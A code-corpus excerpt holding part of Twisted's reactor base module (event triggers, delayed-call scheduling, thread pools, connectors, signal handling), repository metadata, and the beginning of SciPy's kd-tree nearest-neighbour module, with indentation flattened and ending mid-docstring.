"""Handle a SIGINT interrupt.
"""
log.msg("Received SIGINT, shutting down.")
self.callFromThread(self.stop)
def sigBreak(self, *args):
"""Handle a SIGBREAK interrupt.
"""
log.msg("Received SIGBREAK, shutting down.")
self.callFromThread(self.stop)
def sigTerm(self, *args):
"""Handle a SIGTERM interrupt.
"""
log.msg("Received SIGTERM, shutting down.")
self.callFromThread(self.stop)
def disconnectAll(self):
"""Disconnect every reader, and writer in the system.
"""
selectables = self.removeAll()
for reader in selectables:
log.callWithLogger(reader,
reader.connectionLost,
failure.Failure(main.CONNECTION_LOST))
def iterate(self, delay=0):
"""See twisted.internet.interfaces.IReactorCore.iterate.
"""
self.runUntilCurrent()
self.doIteration(delay)
def fireSystemEvent(self, eventType):
"""See twisted.internet.interfaces.IReactorCore.fireSystemEvent.
"""
event = self._eventTriggers.get(eventType)
if event is not None:
event.fireEvent()
def addSystemEventTrigger(self, _phase, _eventType, _f, *args, **kw):
"""See twisted.internet.interfaces.IReactorCore.addSystemEventTrigger.
"""
assert callable(_f), "%s is not callable" % _f
if _eventType not in self._eventTriggers:
self._eventTriggers[_eventType] = _ThreePhaseEvent()
return (_eventType, self._eventTriggers[_eventType].addTrigger(
_phase, _f, *args, **kw))
def removeSystemEventTrigger(self, triggerID):
"""See twisted.internet.interfaces.IReactorCore.removeSystemEventTrigger.
"""
eventType, handle = triggerID
self._eventTriggers[eventType].removeTrigger(handle)
def callWhenRunning(self, _callable, *args, **kw):
"""See twisted.internet.interfaces.IReactorCore.callWhenRunning.
"""
if self.running:
_callable(*args, **kw)
else:
return self.addSystemEventTrigger('after', 'startup',
_callable, *args, **kw)
def startRunning(self):
"""
Method called when reactor starts: do some initialization and fire
startup events.
Don't call this directly, call reactor.run() instead: it should take
care of calling this.
This method is somewhat misnamed. The reactor will not necessarily be
in the running state by the time this method returns. The only
guarantee is that it will be on its way to the running state.
"""
if self._started:
raise error.ReactorAlreadyRunning()
if self._startedBefore:
raise error.ReactorNotRestartable()
self._started = True
self._stopped = False
if self._registerAsIOThread:
threadable.registerAsIOThread()
self.fireSystemEvent('startup')
def _reallyStartRunning(self):
"""
Method called to transition to the running state. This should happen
in the I{during startup} event trigger phase.
"""
self.running = True
# IReactorTime
seconds = staticmethod(runtimeSeconds)
def callLater(self, _seconds, _f, *args, **kw):
"""See twisted.internet.interfaces.IReactorTime.callLater.
"""
assert callable(_f), "%s is not callable" % _f
assert _seconds >= 0, \
"%s is not greater than or equal to 0 seconds" % (_seconds,)
tple = DelayedCall(self.seconds() + _seconds, _f, args, kw,
self._cancelCallLater,
self._moveCallLaterSooner,
seconds=self.seconds)
self._newTimedCalls.append(tple)
return tple
def _moveCallLaterSooner(self, tple):
# Linear time find: slow.
heap = self._pendingTimedCalls
try:
pos = heap.index(tple)
# Move elt up the heap until it rests at the right place.
elt = heap[pos]
while pos != 0:
parent = (pos-1) // 2
if heap[parent] <= elt:
break
# move parent down
heap[pos] = heap[parent]
pos = parent
heap[pos] = elt
except ValueError:
# element was not found in heap - oh well...
pass
def _cancelCallLater(self, tple):
self._cancellations+=1
def getDelayedCalls(self):
"""
Return all the outstanding delayed calls in the system.
They are returned in no particular order.
This method is not efficient -- it is really only meant for
test cases.
@return: A list of outstanding delayed calls.
@type: L{list} of L{DelayedCall}
"""
return [x for x in (self._pendingTimedCalls + self._newTimedCalls) if not x.cancelled]
def _insertNewDelayedCalls(self):
for call in self._newTimedCalls:
if call.cancelled:
self._cancellations-=1
else:
call.activate_delay()
heappush(self._pendingTimedCalls, call)
self._newTimedCalls = []
def timeout(self):
"""
Determine the longest time the reactor may sleep (waiting on I/O
notification, perhaps) before it must wake up to service a time-related
event.
@return: The maximum number of seconds the reactor may sleep.
@rtype: L{float}
"""
# insert new delayed calls to make sure to include them in timeout value
self._insertNewDelayedCalls()
if not self._pendingTimedCalls:
return None
delay = self._pendingTimedCalls[0].time - self.seconds()
# Pick a somewhat arbitrary maximum possible value for the timeout.
# This value is 2 ** 31 / 1000, which is the number of seconds which can
# be represented as an integer number of milliseconds in a signed 32 bit
# integer. This particular limit is imposed by the epoll_wait(3)
# interface which accepts a timeout as a C "int" type and treats it as
# representing a number of milliseconds.
longest = 2147483
# Don't let the delay be in the past (negative) or exceed a plausible
# maximum (platform-imposed) interval.
return max(0, min(longest, delay))
def runUntilCurrent(self):
"""
Run all pending timed calls.
"""
if self.threadCallQueue:
# Keep track of how many calls we actually make, as we're
# making them, in case another call is added to the queue
# while we're in this loop.
count = 0
total = len(self.threadCallQueue)
for (f, a, kw) in self.threadCallQueue:
try:
f(*a, **kw)
except:
log.err()
count += 1
if count == total:
break
del self.threadCallQueue[:count]
if self.threadCallQueue:
self.wakeUp()
# insert new delayed calls now
self._insertNewDelayedCalls()
now = self.seconds()
while self._pendingTimedCalls and (self._pendingTimedCalls[0].time <= now):
call = heappop(self._pendingTimedCalls)
if call.cancelled:
self._cancellations-=1
continue
if call.delayed_time > 0:
call.activate_delay()
heappush(self._pendingTimedCalls, call)
continue
try:
call.called = 1
call.func(*call.args, **call.kw)
except:
log.deferr()
if hasattr(call, "creator"):
e = "\n"
e += " C: previous exception occurred in " + \
"a DelayedCall created here:\n"
e += " C:"
e += "".join(call.creator).rstrip().replace("\n","\n C:")
e += "\n"
log.msg(e)
if (self._cancellations > 50 and
self._cancellations > len(self._pendingTimedCalls) >> 1):
self._cancellations = 0
self._pendingTimedCalls = [x for x in self._pendingTimedCalls
if not x.cancelled]
heapify(self._pendingTimedCalls)
if self._justStopped:
self._justStopped = False
self.fireSystemEvent("shutdown")
# IReactorProcess
def _checkProcessArgs(self, args, env):
"""
Check for valid arguments and environment to spawnProcess.
@return: A two element tuple giving values to use when creating the
process. The first element of the tuple is a C{list} of C{bytes}
giving the values for argv of the child process. The second element
of the tuple is either L{None} if C{env} was L{None} or a C{dict}
mapping C{bytes} environment keys to C{bytes} environment values.
"""
# Any unicode string which Python would successfully implicitly
# encode to a byte string would have worked before these explicit
# checks were added. Anything which would have failed with a
# UnicodeEncodeError during that implicit encoding step would have
# raised an exception in the child process and that would have been
# a pain in the butt to debug.
#
# So, we will explicitly attempt the same encoding which Python
# would implicitly do later. If it fails, we will report an error
# without ever spawning a child process. If it succeeds, we'll save
# the result so that Python doesn't need to do it implicitly later.
#
# -exarkun
defaultEncoding = sys.getfilesystemencoding()
# Common check function
def argChecker(arg):
"""
Return either L{bytes} or L{None}. If the given value is not
allowable for some reason, L{None} is returned. Otherwise, a
possibly different object which should be used in place of arg is
returned. This forces unicode encoding to happen now, rather than
implicitly later.
"""
if isinstance(arg, unicode):
try:
arg = arg.encode(defaultEncoding)
except UnicodeEncodeError:
return None
if isinstance(arg, bytes) and b'\0' not in arg:
return arg
return None
# Make a few tests to check input validity
if not isinstance(args, (tuple, list)):
raise TypeError("Arguments must be a tuple or list")
outputArgs = []
for arg in args:
arg = argChecker(arg)
if arg is None:
raise TypeError("Arguments contain a non-string value")
else:
outputArgs.append(arg)
outputEnv = None
if env is not None:
outputEnv = {}
for key, val in iteritems(env):
key = argChecker(key)
if key is None:
raise TypeError("Environment contains a non-string key")
val = argChecker(val)
if val is None:
raise TypeError("Environment contains a non-string value")
outputEnv[key] = val
return outputArgs, outputEnv
# IReactorThreads
if platform.supportsThreads():
threadpool = None
# ID of the trigger starting the threadpool
_threadpoolStartupID = None
# ID of the trigger stopping the threadpool
threadpoolShutdownID = None
def _initThreads(self):
self.installNameResolver(_GAIResolver(self, self.getThreadPool))
self.usingThreads = True
def callFromThread(self, f, *args, **kw):
"""
See
L{twisted.internet.interfaces.IReactorFromThreads.callFromThread}.
"""
assert callable(f), "%s is not callable" % (f,)
# lists are thread-safe in CPython, but not in Jython
# this is probably a bug in Jython, but until fixed this code
# won't work in Jython.
self.threadCallQueue.append((f, args, kw))
self.wakeUp()
def _initThreadPool(self):
"""
Create the threadpool accessible with callFromThread.
"""
from twisted.python import threadpool
self.threadpool = threadpool.ThreadPool(
0, 10, 'twisted.internet.reactor')
self._threadpoolStartupID = self.callWhenRunning(
self.threadpool.start)
self.threadpoolShutdownID = self.addSystemEventTrigger(
'during', 'shutdown', self._stopThreadPool)
def _uninstallHandler(self):
pass
def _stopThreadPool(self):
"""
Stop the reactor threadpool. This method is only valid if there
is currently a threadpool (created by L{_initThreadPool}). It
is not intended to be called directly; instead, it will be
called by a shutdown trigger created in L{_initThreadPool}.
"""
triggers = [self._threadpoolStartupID, self.threadpoolShutdownID]
for trigger in filter(None, triggers):
try:
self.removeSystemEventTrigger(trigger)
except ValueError:
pass
self._threadpoolStartupID = None
self.threadpoolShutdownID = None
self.threadpool.stop()
self.threadpool = None
def getThreadPool(self):
"""
See L{twisted.internet.interfaces.IReactorThreads.getThreadPool}.
"""
if self.threadpool is None:
self._initThreadPool()
return self.threadpool
def callInThread(self, _callable, *args, **kwargs):
"""
See L{twisted.internet.interfaces.IReactorInThreads.callInThread}.
"""
self.getThreadPool().callInThread(_callable, *args, **kwargs)
def suggestThreadPoolSize(self, size):
"""
See L{twisted.internet.interfaces.IReactorThreads.suggestThreadPoolSize}.
"""
self.getThreadPool().adjustPoolsize(maxthreads=size)
else:
# This is for signal handlers.
def callFromThread(self, f, *args, **kw):
assert callable(f), "%s is not callable" % (f,)
# See comment in the other callFromThread implementation.
self.threadCallQueue.append((f, args, kw))
if platform.supportsThreads():
classImplements(ReactorBase, IReactorThreads)
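# Illustrative sketch, not part of the original module: the usual way application
# code hooks into the lifecycle machinery implemented by ReactorBase.
def _exampleSystemEventTriggers():
    from twisted.internet import reactor
    reactor.callWhenRunning(log.msg, "reactor is up")
    reactor.addSystemEventTrigger('before', 'shutdown',
                                  log.msg, "about to shut down")
    reactor.callLater(3, reactor.stop)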
@implementer(IConnector)
@_oldStyle
class BaseConnector:
"""Basic implementation of connector.
State can be: "connecting", "connected", "disconnected"
"""
timeoutID = None
factoryStarted = 0
def __init__(self, factory, timeout, reactor):
self.state = "disconnected"
self.reactor = reactor
self.factory = factory
self.timeout = timeout
def disconnect(self):
"""Disconnect whatever our state is."""
if self.state == 'connecting':
self.stopConnecting()
elif self.state == 'connected':
self.transport.loseConnection()
def connect(self):
"""Start connection to remote server."""
if self.state != "disconnected":
raise RuntimeError("can't connect in this state")
self.state = "connecting"
if not self.factoryStarted:
self.factory.doStart()
self.factoryStarted = 1
self.transport = transport = self._makeTransport()
if self.timeout is not None:
self.timeoutID = self.reactor.callLater(self.timeout, transport.failIfNotConnected, error.TimeoutError())
self.factory.startedConnecting(self)
def stopConnecting(self):
"""Stop attempting to connect."""
if self.state != "connecting":
raise error.NotConnectingError("we're not trying to connect")
self.state = "disconnected"
self.transport.failIfNotConnected(error.UserError())
del self.transport
def cancelTimeout(self):
if self.timeoutID is not None:
try:
self.timeoutID.cancel()
except ValueError:
pass
del self.timeoutID
def buildProtocol(self, addr):
self.state = "connected"
self.cancelTimeout()
return self.factory.buildProtocol(addr)
def connectionFailed(self, reason):
self.cancelTimeout()
self.transport = None
self.state = "disconnected"
self.factory.clientConnectionFailed(self, reason)
if self.state == "disconnected":
# factory hasn't called our connect() method
self.factory.doStop()
self.factoryStarted = 0
def connectionLost(self, reason):
self.state = "disconnected"
self.factory.clientConnectionLost(self, reason)
if self.state == "disconnected":
# factory hasn't called our connect() method
self.factory.doStop()
self.factoryStarted = 0
def getDestination(self):
raise NotImplementedError(
reflect.qual(self.__class__) + " did not implement "
"getDestination")
class BasePort(abstract.FileDescriptor):
"""Basic implementation of a ListeningPort.
Note: This does not actually implement IListeningPort.
"""
addressFamily = None
socketType = None
def createInternetSocket(self):
s = socket.socket(self.addressFamily, self.socketType)
s.setblocking(0)
fdesc._setCloseOnExec(s.fileno())
return s
def doWrite(self):
"""Raises a RuntimeError"""
raise RuntimeError(
"doWrite called on a %s" % reflect.qual(self.__class__))
class _SignalReactorMixin(object):
"""
Private mixin to manage signals: it installs signal handlers at start time,
    and defines the run method.
It can only be used mixed in with L{ReactorBase}, and has to be defined
first in the inheritance (so that method resolution order finds
startRunning first).
@type _installSignalHandlers: C{bool}
@ivar _installSignalHandlers: A flag which indicates whether any signal
handlers will be installed during startup. This includes handlers for
SIGCHLD to monitor child processes, and SIGINT, SIGTERM, and SIGBREAK
to stop the reactor.
"""
_installSignalHandlers = False
def _handleSignals(self):
"""
Install the signal handlers for the Twisted event loop.
"""
try:
import signal
except ImportError:
log.msg("Warning: signal module unavailable -- "
"not installing signal handlers.")
return
if signal.getsignal(signal.SIGINT) == signal.default_int_handler:
# only handle if there isn't already a handler, e.g. for Pdb.
signal.signal(signal.SIGINT, self.sigInt)
signal.signal(signal.SIGTERM, self.sigTerm)
# Catch Ctrl-Break in windows
if hasattr(signal, "SIGBREAK"):
signal.signal(signal.SIGBREAK, self.sigBreak)
def startRunning(self, installSignalHandlers=True):
"""
Extend the base implementation in order to remember whether signal
handlers should be installed later.
@type installSignalHandlers: C{bool}
@param installSignalHandlers: A flag which, if set, indicates that
handlers for a number of (implementation-defined) signals should be
installed during startup.
"""
self._installSignalHandlers = installSignalHandlers
ReactorBase.startRunning(self)
def _reallyStartRunning(self):
"""
Extend the base implementation by also installing signal handlers, if
C{self._installSignalHandlers} is true.
"""
ReactorBase._reallyStartRunning(self)
if self._installSignalHandlers:
# Make sure this happens before after-startup events, since the
# expectation of after-startup is that the reactor is fully
# initialized. Don't do it right away for historical reasons
# (perhaps some before-startup triggers don't want there to be a
# custom SIGCHLD handler so that they can run child processes with
# some blocking api).
self._handleSignals()
def run(self, installSignalHandlers=True):
self.startRunning(installSignalHandlers=installSignalHandlers)
self.mainLoop()
def mainLoop(self):
while self._started:
try:
while self._started:
# Advance simulation time in delayed event
# processors.
self.runUntilCurrent()
t2 = self.timeout()
t = self.running and t2
self.doIteration(t)
except:
log.msg("Unexpected error in main loop.")
log.err()
else:
log.msg('Main loop terminated.')
__all__ = []
| {
"content_hash": "4aab653bd536e2f6fad2765a25a342b4",
"timestamp": "",
"source": "github",
"line_count": 1260,
"max_line_length": 117,
"avg_line_length": 34.467460317460315,
"alnum_prop": 0.5992769808192683,
"repo_name": "EricMuller/mynotes-backend",
"id": "3e1c63cbf61fde8ff756daf70f946921ac3ccd35",
"size": "43587",
"binary": false,
"copies": "11",
"ref": "refs/heads/master",
"path": "requirements/twisted/Twisted-17.1.0/build/lib.linux-x86_64-3.5/twisted/internet/base.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "ApacheConf",
"bytes": "11880"
},
{
"name": "Batchfile",
"bytes": "3516"
},
{
"name": "C",
"bytes": "37168"
},
{
"name": "CSS",
"bytes": "6613"
},
{
"name": "DIGITAL Command Language",
"bytes": "1032"
},
{
"name": "GAP",
"bytes": "36244"
},
{
"name": "HTML",
"bytes": "233863"
},
{
"name": "Makefile",
"bytes": "6766"
},
{
"name": "Nginx",
"bytes": "998"
},
{
"name": "Objective-C",
"bytes": "2584"
},
{
"name": "Python",
"bytes": "22991176"
},
{
"name": "Roff",
"bytes": "160293"
},
{
"name": "Shell",
"bytes": "13496"
},
{
"name": "Smarty",
"bytes": "1366"
}
],
"symlink_target": ""
} |
from __future__ import division, print_function, absolute_import
import sys
import numpy as np
from heapq import heappush, heappop
import scipy.sparse
__all__ = ['minkowski_distance_p', 'minkowski_distance',
'distance_matrix',
'Rectangle', 'KDTree']
def minkowski_distance_p(x, y, p=2):
"""
Compute the p-th power of the L**p distance between two arrays.
For efficiency, this function computes the L**p distance but does
not extract the pth root. If `p` is 1 or infinity, this is equal to
the actual L**p distance.
Parameters
----------
x : (M, K) array_like
Input array.
y : (N, K) array_like
Input array.
p : float, 1 <= p <= infinity
Which Minkowski p-norm to use.
Examples
--------
>>> from scipy.spatial import minkowski_distance_p
>>> minkowski_distance_p([[0,0],[0,0]], [[1,1],[0,1]])
array([2, 1])
"""
x = np.asarray(x)
y = np.asarray(y)
# Find smallest common datatype with float64 (return type of this function) - addresses #10262.
# Don't just cast to float64 for complex input case.
common_datatype = np.promote_types(np.promote_types(x.dtype, y.dtype), 'float64')
# Make sure x and y are numpy arrays of correct datatype.
x = x.astype(common_datatype)
y = y.astype(common_datatype)
if p == np.inf:
return np.amax(np.abs(y-x), axis=-1)
elif p == 1:
return np.sum(np.abs(y-x), axis=-1)
else:
return np.sum(np.abs(y-x)**p, axis=-1)
def minkowski_distance(x, y, p=2):
"""
Compute the L**p distance between two arrays.
Parameters
----------
x : (M, K) array_like
Input array.
y : (N, K) array_like
Input array.
p : float, 1 <= p <= infinity
Which Minkowski p-norm to use.
Examples
--------
>>> from scipy.spatial import minkowski_distance
>>> minkowski_distance([[0,0],[0,0]], [[1,1],[0,1]])
array([ 1.41421356, 1. ])
"""
x = np.asarray(x)
y = np.asarray(y)
if p == np.inf or p == 1:
return minkowski_distance_p(x, y, p)
else:
return minkowski_distance_p(x, y, p)**(1./p)
class Rectangle(object):
"""Hyperrectangle class.
Represents a Cartesian product of intervals.
"""
def __init__(self, maxes, mins):
"""Construct a hyperrectangle."""
self.maxes = np.maximum(maxes,mins).astype(float)
self.mins = np.minimum(maxes,mins).astype(float)
self.m, = self.maxes.shape
def __repr__(self):
return "<Rectangle %s>" % list(zip(self.mins, self.maxes))
def volume(self):
"""Total volume."""
return np.prod(self.maxes-self.mins)
def split(self, d, split):
"""
Produce two hyperrectangles by splitting.
In general, if you need to compute maximum and minimum
distances to the children, it can be done more efficiently
by updating the maximum and minimum distances to the parent.
Parameters
----------
d : int
Axis to split hyperrectangle along.
split : float
Position along axis `d` to split at.
"""
mid = np.copy(self.maxes)
mid[d] = split
less = Rectangle(self.mins, mid)
mid = np.copy(self.mins)
mid[d] = split
greater = Rectangle(mid, self.maxes)
return less, greater
def min_distance_point(self, x, p=2.):
"""
Return the minimum distance between input and points in the hyperrectangle.
Parameters
----------
x : array_like
Input.
p : float, optional
Input.
"""
return minkowski_distance(0, np.maximum(0,np.maximum(self.mins-x,x-self.maxes)),p)
def max_distance_point(self, x, p=2.):
"""
Return the maximum distance between input and points in the hyperrectangle.
Parameters
----------
x : array_like
Input array.
p : float, optional
Input.
"""
return minkowski_distance(0, np.maximum(self.maxes-x,x-self.mins),p)
def min_distance_rectangle(self, other, p=2.):
"""
Compute the minimum distance between points in the two hyperrectangles.
Parameters
----------
other : hyperrectangle
Input.
p : float
Input.
"""
return minkowski_distance(0, np.maximum(0,np.maximum(self.mins-other.maxes,other.mins-self.maxes)),p)
def max_distance_rectangle(self, other, p=2.):
"""
Compute the maximum distance between points in the two hyperrectangles.
Parameters
----------
other : hyperrectangle
Input.
p : float, optional
Input.
"""
return minkowski_distance(0, np.maximum(self.maxes-other.mins,other.maxes-self.mins),p)
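# Illustrative sketch, not part of the original module: splitting the unit square
# along its first axis and measuring distances from a point outside it.
def _example_rectangle():
    rect = Rectangle([1.0, 1.0], [0.0, 0.0])   # unit square
    less, greater = rect.split(0, 0.5)         # split x at 0.5
    point = np.array([2.0, 0.5])
    # The nearest edge of `greater` is at x=1, of `less` at x=0.5.
    return less.min_distance_point(point), greater.min_distance_point(point)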
class KDTree(object):
"""
kd-tree for quick nearest-neighbor lookup
This class provides an index into a set of k-dimensional points which
can be used to rapidly look up the nearest neighbors of any point.
Parameters
----------
data : (N,K) array_like
The data points to be indexed. This array is not copied, and
so modifying this data will result in bogus results.
leafsize : int, optional
The number of points at which the algorithm switches over to
brute-force. Has to be positive.
Raises
------
RuntimeError
The maximum recursion limit can be exceeded for large data
sets. If this happens, either increase the value for the `leafsize`
parameter or increase the recursion limit by::
>>> import sys
>>> sys.setrecursionlimit(10000)
See Also
--------
cKDTree : Implementation of `KDTree` in Cython
Notes
-----
The algorithm used is described in Maneewongvatana and Mount 1999.
The general idea is that the kd-tree is a binary tree, each of whose
nodes represents an axis-aligned hyperrectangle. Each node specifies
an axis and splits the set of points based on whether their coordinate
along that axis is greater than or less than a particular value.
During construction, the axis and splitting point are chosen by the
"sliding midpoint" rule, which ensures that the cells do not all
become long and thin.
The tree can be queried for the r closest neighbors of any given point
(optionally returning only those within some maximum distance of the
point). It can also be queried, with a substantial gain in efficiency,
for the r approximate closest neighbors.
For large dimensions (20 is already large) do not expect this to run
significantly faster than brute force. High-dimensional nearest-neighbor
queries are a substantial open problem in computer science.
The tree also supports all-neighbors queries, both with arrays of points
and with other kd-trees. These do use a reasonably efficient algorithm,
but the kd-tree is not necessarily the best data structure for this
sort of calculation.
"""
def __init__(self, data, leafsize=10):
self.data = np.asarray(data)
self.n, self.m = np.shape(self.data)
self.leafsize = int(leafsize)
if self.leafsize < 1:
raise ValueError("leafsize must be at least 1")
self.maxes = np.amax(self.data,axis=0)
self.mins = np.amin(self.data,axis=0)
self.tree = self.__build(np.arange(self.n), self.maxes, self.mins)
class node(object):
if sys.version_info[0] >= 3:
def __lt__(self, other):
return id(self) < id(other)
def __gt__(self, other):
return id(self) > id(other)
def __le__(self, other):
return id(self) <= id(other)
def __ge__(self, other):
return id(self) >= id(other)
def __eq__(self, other):
return id(self) == id(other)
class leafnode(node):
def __init__(self, idx):
self.idx = idx
self.children = len(idx)
class innernode(node):
def __init__(self, split_dim, split, less, greater):
self.split_dim = split_dim
self.split = split
self.less = less
self.greater = greater
self.children = less.children+greater.children
def __build(self, idx, maxes, mins):
if len(idx) <= self.leafsize:
return KDTree.leafnode(idx)
else:
data = self.data[idx]
# maxes = np.amax(data,axis=0)
# mins = np.amin(data,axis=0)
d = np.argmax(maxes-mins)
maxval = maxes[d]
minval = mins[d]
if maxval == minval:
# all points are identical; warn user?
return KDTree.leafnode(idx)
data = data[:,d]
# sliding midpoint rule; see Maneewongvatana and Mount 1999
# for arguments that this is a good idea.
split = (maxval+minval)/2
less_idx = np.nonzero(data <= split)[0]
greater_idx = np.nonzero(data > split)[0]
if len(less_idx) == 0:
split = np.amin(data)
less_idx = np.nonzero(data <= split)[0]
greater_idx = np.nonzero(data > split)[0]
if len(greater_idx) == 0:
split = np.amax(data)
less_idx = np.nonzero(data < split)[0]
greater_idx = np.nonzero(data >= split)[0]
if len(less_idx) == 0:
# _still_ zero? all must have the same value
if not np.all(data == data[0]):
raise ValueError("Troublesome data array: %s" % data)
split = data[0]
less_idx = np.arange(len(data)-1)
greater_idx = np.array([len(data)-1])
lessmaxes = np.copy(maxes)
lessmaxes[d] = split
greatermins = np.copy(mins)
greatermins[d] = split
return KDTree.innernode(d, split,
self.__build(idx[less_idx],lessmaxes,mins),
self.__build(idx[greater_idx],maxes,greatermins))
def __query(self, x, k=1, eps=0, p=2, distance_upper_bound=np.inf):
side_distances = np.maximum(0,np.maximum(x-self.maxes,self.mins-x))
if p != np.inf:
side_distances **= p
min_distance = np.sum(side_distances)
else:
min_distance = np.amax(side_distances)
# priority queue for chasing nodes
# entries are:
# minimum distance between the cell and the target
# distances between the nearest side of the cell and the target
# the head node of the cell
q = [(min_distance,
tuple(side_distances),
self.tree)]
# priority queue for the nearest neighbors
# furthest known neighbor first
# entries are (-distance**p, i)
neighbors = []
if eps == 0:
epsfac = 1
elif p == np.inf:
epsfac = 1/(1+eps)
else:
epsfac = 1/(1+eps)**p
if p != np.inf and distance_upper_bound != np.inf:
distance_upper_bound = distance_upper_bound**p
while q:
min_distance, side_distances, node = heappop(q)
if isinstance(node, KDTree.leafnode):
# brute-force
data = self.data[node.idx]
ds = minkowski_distance_p(data,x[np.newaxis,:],p)
for i in range(len(ds)):
if ds[i] < distance_upper_bound:
if len(neighbors) == k:
heappop(neighbors)
heappush(neighbors, (-ds[i], node.idx[i]))
if len(neighbors) == k:
distance_upper_bound = -neighbors[0][0]
else:
# we don't push cells that are too far onto the queue at all,
# but since the distance_upper_bound decreases, we might get
# here even if the cell's too far
if min_distance > distance_upper_bound*epsfac:
# since this is the nearest cell, we're done, bail out
break
# compute minimum distances to the children and push them on
if x[node.split_dim] < node.split:
near, far = node.less, node.greater
else:
near, far = node.greater, node.less
# near child is at the same distance as the current node
heappush(q,(min_distance, side_distances, near))
# far child is further by an amount depending only
# on the split value
sd = list(side_distances)
if p == np.inf:
min_distance = max(min_distance, abs(node.split-x[node.split_dim]))
elif p == 1:
sd[node.split_dim] = np.abs(node.split-x[node.split_dim])
min_distance = min_distance - side_distances[node.split_dim] + sd[node.split_dim]
else:
sd[node.split_dim] = np.abs(node.split-x[node.split_dim])**p
min_distance = min_distance - side_distances[node.split_dim] + sd[node.split_dim]
# far child might be too far, if so, don't bother pushing it
if min_distance <= distance_upper_bound*epsfac:
heappush(q,(min_distance, tuple(sd), far))
if p == np.inf:
return sorted([(-d,i) for (d,i) in neighbors])
else:
return sorted([((-d)**(1./p),i) for (d,i) in neighbors])
def query(self, x, k=1, eps=0, p=2, distance_upper_bound=np.inf):
"""
Query the kd-tree for nearest neighbors
Parameters
----------
x : array_like, last dimension self.m
An array of points to query.
k : int, optional
The number of nearest neighbors to return.
eps : nonnegative float, optional
Return approximate nearest neighbors; the kth returned value
is guaranteed to be no further than (1+eps) times the
distance to the real kth nearest neighbor.
p : float, 1<=p<=infinity, optional
Which Minkowski p-norm to use.
1 is the sum-of-absolute-values "Manhattan" distance
2 is the usual Euclidean distance
infinity is the maximum-coordinate-difference distance
distance_upper_bound : nonnegative float, optional
Return only neighbors within this distance. This is used to prune
tree searches, so if you are doing a series of nearest-neighbor
queries, it may help to supply the distance to the nearest neighbor
of the most recent point.
Returns
-------
d : float or array of floats
The distances to the nearest neighbors.
If x has shape tuple+(self.m,), then d has shape tuple if
k is one, or tuple+(k,) if k is larger than one. Missing
neighbors (e.g. when k > n or distance_upper_bound is
given) are indicated with infinite distances. If k is None,
then d is an object array of shape tuple, containing lists
of distances. In either case the hits are sorted by distance
(nearest first).
i : integer or array of integers
The locations of the neighbors in self.data. i is the same
shape as d.
Examples
--------
>>> from scipy import spatial
>>> x, y = np.mgrid[0:5, 2:8]
>>> tree = spatial.KDTree(list(zip(x.ravel(), y.ravel())))
>>> tree.data
array([[0, 2],
[0, 3],
[0, 4],
[0, 5],
[0, 6],
[0, 7],
[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 2],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 2],
[3, 3],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 2],
[4, 3],
[4, 4],
[4, 5],
[4, 6],
[4, 7]])
>>> pts = np.array([[0, 0], [2.1, 2.9]])
>>> tree.query(pts)
(array([ 2. , 0.14142136]), array([ 0, 13]))
>>> tree.query(pts[0])
(2.0, 0)
"""
x = np.asarray(x)
if np.shape(x)[-1] != self.m:
raise ValueError("x must consist of vectors of length %d but has shape %s" % (self.m, np.shape(x)))
if p < 1:
raise ValueError("Only p-norms with 1<=p<=infinity permitted")
retshape = np.shape(x)[:-1]
if retshape != ():
if k is None:
dd = np.empty(retshape,dtype=object)
ii = np.empty(retshape,dtype=object)
elif k > 1:
dd = np.empty(retshape+(k,),dtype=float)
dd.fill(np.inf)
ii = np.empty(retshape+(k,),dtype=int)
ii.fill(self.n)
elif k == 1:
dd = np.empty(retshape,dtype=float)
dd.fill(np.inf)
ii = np.empty(retshape,dtype=int)
ii.fill(self.n)
else:
raise ValueError("Requested %s nearest neighbors; acceptable numbers are integers greater than or equal to one, or None")
for c in np.ndindex(retshape):
hits = self.__query(x[c], k=k, eps=eps, p=p, distance_upper_bound=distance_upper_bound)
if k is None:
dd[c] = [d for (d,i) in hits]
ii[c] = [i for (d,i) in hits]
elif k > 1:
for j in range(len(hits)):
dd[c+(j,)], ii[c+(j,)] = hits[j]
elif k == 1:
if len(hits) > 0:
dd[c], ii[c] = hits[0]
else:
dd[c] = np.inf
ii[c] = self.n
return dd, ii
else:
hits = self.__query(x, k=k, eps=eps, p=p, distance_upper_bound=distance_upper_bound)
if k is None:
return [d for (d,i) in hits], [i for (d,i) in hits]
elif k == 1:
if len(hits) > 0:
return hits[0]
else:
return np.inf, self.n
elif k > 1:
dd = np.empty(k,dtype=float)
dd.fill(np.inf)
ii = np.empty(k,dtype=int)
ii.fill(self.n)
for j in range(len(hits)):
dd[j], ii[j] = hits[j]
return dd, ii
else:
raise ValueError("Requested %s nearest neighbors; acceptable numbers are integers greater than or equal to one, or None")
def __query_ball_point(self, x, r, p=2., eps=0):
R = Rectangle(self.maxes, self.mins)
def traverse_checking(node, rect):
if rect.min_distance_point(x, p) > r / (1. + eps):
return []
elif rect.max_distance_point(x, p) < r * (1. + eps):
return traverse_no_checking(node)
elif isinstance(node, KDTree.leafnode):
d = self.data[node.idx]
return node.idx[minkowski_distance(d, x, p) <= r].tolist()
else:
less, greater = rect.split(node.split_dim, node.split)
return traverse_checking(node.less, less) + \
traverse_checking(node.greater, greater)
def traverse_no_checking(node):
if isinstance(node, KDTree.leafnode):
return node.idx.tolist()
else:
return traverse_no_checking(node.less) + \
traverse_no_checking(node.greater)
return traverse_checking(self.tree, R)
def query_ball_point(self, x, r, p=2., eps=0):
"""Find all points within distance r of point(s) x.
Parameters
----------
x : array_like, shape tuple + (self.m,)
The point or points to search for neighbors of.
r : positive float
The radius of points to return.
p : float, optional
Which Minkowski p-norm to use. Should be in the range [1, inf].
eps : nonnegative float, optional
Approximate search. Branches of the tree are not explored if their
nearest points are further than ``r / (1 + eps)``, and branches are
added in bulk if their furthest points are nearer than
``r * (1 + eps)``.
Returns
-------
results : list or array of lists
If `x` is a single point, returns a list of the indices of the
neighbors of `x`. If `x` is an array of points, returns an object
array of shape tuple containing lists of neighbors.
Notes
-----
If you have many points whose neighbors you want to find, you may save
substantial amounts of time by putting them in a KDTree and using
query_ball_tree.
Examples
--------
>>> from scipy import spatial
>>> x, y = np.mgrid[0:5, 0:5]
>>> points = np.c_[x.ravel(), y.ravel()]
>>> tree = spatial.KDTree(points)
>>> tree.query_ball_point([2, 0], 1)
